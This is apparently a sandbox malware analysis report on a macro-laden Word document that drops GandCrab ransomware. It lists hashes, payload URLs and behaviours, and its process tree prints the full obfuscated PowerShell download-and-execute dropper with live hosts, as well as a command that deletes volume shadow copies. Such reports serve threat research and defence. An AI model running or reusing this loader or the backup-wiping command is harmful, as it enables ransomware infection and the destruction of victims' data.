Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 00:29
Static task
static1
Behavioral task
behavioral1
Sample
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
Resource
win10v2004-20220414-en
General
-
Target
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
-
Size
78KB
-
MD5
fe2d1caa2d52000efcd19ea1ea31d254
-
SHA1
6496aa6a299bc606ee9d058bdf4f0d826a2e4541
-
SHA256
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb
-
SHA512
592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d
Malware Config
Extracted
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
http://sndtgo.ru/word.exe
http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe
Extracted
C:\KXCSWK-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/93c436487f0515a
Signatures
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 448 2456 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 10 3424 powershell.exe 16 3424 powershell.exe 26 3424 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
229.exepid process 1076 229.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
229.exedescription ioc process File renamed C:\Users\Admin\Pictures\AddEnter.raw => C:\Users\Admin\Pictures\AddEnter.raw.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\ConvertToResize.png => C:\Users\Admin\Pictures\ConvertToResize.png.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\HideUse.tif => C:\Users\Admin\Pictures\HideUse.tif.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\MergeApprove.crw => C:\Users\Admin\Pictures\MergeApprove.crw.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\MountWait.crw => C:\Users\Admin\Pictures\MountWait.crw.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\StepSearch.png => C:\Users\Admin\Pictures\StepSearch.png.kxcswk 229.exe File renamed C:\Users\Admin\Pictures\StepUnregister.crw => C:\Users\Admin\Pictures\StepUnregister.crw.kxcswk 229.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
229.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 229.exe -
Drops startup file 2 IoCs
Processes:
229.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\KXCSWK-MANUAL.txt 229.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\87f056b987f0515911d.lock 229.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
229.exedescription ioc process File opened (read-only) \??\A: 229.exe File opened (read-only) \??\L: 229.exe File opened (read-only) \??\M: 229.exe File opened (read-only) \??\O: 229.exe File opened (read-only) \??\Q: 229.exe File opened (read-only) \??\R: 229.exe File opened (read-only) \??\S: 229.exe File opened (read-only) \??\W: 229.exe File opened (read-only) \??\B: 229.exe File opened (read-only) \??\E: 229.exe File opened (read-only) \??\F: 229.exe File opened (read-only) \??\H: 229.exe File opened (read-only) \??\U: 229.exe File opened (read-only) \??\J: 229.exe File opened (read-only) \??\K: 229.exe File opened (read-only) \??\T: 229.exe File opened (read-only) \??\G: 229.exe File opened (read-only) \??\I: 229.exe File opened (read-only) \??\N: 229.exe File opened (read-only) \??\P: 229.exe File opened (read-only) \??\V: 229.exe File opened (read-only) \??\X: 229.exe File opened (read-only) \??\Y: 229.exe File opened (read-only) \??\Z: 229.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
229.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" 229.exe -
Drops file in Program Files directory 18 IoCs
Processes:
229.exedescription ioc process File opened for modification C:\Program Files\SaveSend.emz 229.exe File opened for modification C:\Program Files\SelectUnlock.search-ms 229.exe File opened for modification C:\Program Files\UndoExit.vsx 229.exe File opened for modification C:\Program Files\SaveInstall.mid 229.exe File opened for modification C:\Program Files\EnterRevoke.hta 229.exe File opened for modification C:\Program Files\ImportRead.wma 229.exe File opened for modification C:\Program Files\UseImport.reg 229.exe File opened for modification C:\Program Files\WatchBackup.vsdm 229.exe File created C:\Program Files\KXCSWK-MANUAL.txt 229.exe File opened for modification C:\Program Files\CompressClear.au 229.exe File opened for modification C:\Program Files\ShowEnable.tiff 229.exe File opened for modification C:\Program Files\UseDisable.avi 229.exe File created C:\Program Files (x86)\KXCSWK-MANUAL.txt 229.exe File created C:\Program Files (x86)\87f056b987f0515911d.lock 229.exe File created C:\Program Files\87f056b987f0515911d.lock 229.exe File opened for modification C:\Program Files\UnlockWatch.reg 229.exe File opened for modification C:\Program Files\UnprotectBackup.pdf 229.exe File opened for modification C:\Program Files\OutMove.xla 229.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXE229.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 229.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2456 WINWORD.EXE 2456 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exe229.exepid process 3424 powershell.exe 3424 powershell.exe 1076 229.exe 1076 229.exe 1076 229.exe 1076 229.exe 1076 229.exe 1076 229.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 3424 powershell.exe Token: 33 3876 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3876 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
229.exepid process 1076 229.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
229.exepid process 1076 229.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE 2456 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exe229.exedescription pid process target process PID 2456 wrote to memory of 448 2456 WINWORD.EXE cmd.exe PID 2456 wrote to memory of 448 2456 WINWORD.EXE cmd.exe PID 448 wrote to memory of 3424 448 cmd.exe powershell.exe PID 448 wrote to memory of 3424 448 cmd.exe powershell.exe PID 3424 wrote to memory of 1076 3424 powershell.exe 229.exe PID 3424 wrote to memory of 1076 3424 powershell.exe 229.exe PID 3424 wrote to memory of 1076 3424 powershell.exe 229.exe PID 1076 wrote to memory of 3100 1076 229.exe cmd.exe PID 1076 wrote to memory of 3100 1076 229.exe cmd.exe PID 1076 wrote to memory of 3100 1076 229.exe cmd.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\windows\temp\229.exe"C:\windows\temp\229.exe"4⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet5⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f4 0x4f81⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmFilesize
162B
MD56b79b8a6efa3f47dbcadc9fdc69dc52d
SHA1afe2b3e9ae5e84e7695f9b325d59f6a66c769576
SHA256f6f3bc588a680613e90199955aead16cf4bd450cdba1c1cc7ab1d8de8d90210a
SHA512184484a1fd9ddd1d704010c2fb897b2176d9371650e4eb2af432f58902007f9bea0f7eee9a8563c707bfee5200aaabd5538a44b7141d4e096a20ddf34c0a2d57
-
C:\Windows\Temp\229.exeFilesize
535KB
MD5a76b7140cf6d5c4dc5e0ecff23fc2ce0
SHA1b312fef877f8eae6ca473a969f30bc85d907f7e3
SHA2563a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972
SHA5126a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1
-
C:\windows\temp\229.exeFilesize
535KB
MD5a76b7140cf6d5c4dc5e0ecff23fc2ce0
SHA1b312fef877f8eae6ca473a969f30bc85d907f7e3
SHA2563a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972
SHA5126a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1
-
memory/448-137-0x0000000000000000-mapping.dmp
-
memory/1076-146-0x0000000000400000-0x000000000048D000-memory.dmpFilesize
564KB
-
memory/1076-145-0x00000000021F0000-0x0000000002210000-memory.dmpFilesize
128KB
-
memory/1076-142-0x0000000000000000-mapping.dmp
-
memory/2456-134-0x00007FFD89370000-0x00007FFD89380000-memory.dmpFilesize
64KB
-
memory/2456-139-0x0000017971280000-0x0000017971284000-memory.dmpFilesize
16KB
-
memory/2456-136-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmpFilesize
64KB
-
memory/2456-135-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmpFilesize
64KB
-
memory/2456-130-0x00007FFD89370000-0x00007FFD89380000-memory.dmpFilesize
64KB
-
memory/2456-133-0x00007FFD89370000-0x00007FFD89380000-memory.dmpFilesize
64KB
-
memory/2456-132-0x00007FFD89370000-0x00007FFD89380000-memory.dmpFilesize
64KB
-
memory/2456-131-0x00007FFD89370000-0x00007FFD89380000-memory.dmpFilesize
64KB
-
memory/3100-148-0x0000000000000000-mapping.dmp
-
memory/3424-138-0x0000000000000000-mapping.dmp
-
memory/3424-140-0x000001D426190000-0x000001D4261B2000-memory.dmpFilesize
136KB
-
memory/3424-141-0x00007FFD9EA60000-0x00007FFD9F521000-memory.dmpFilesize
10.8MB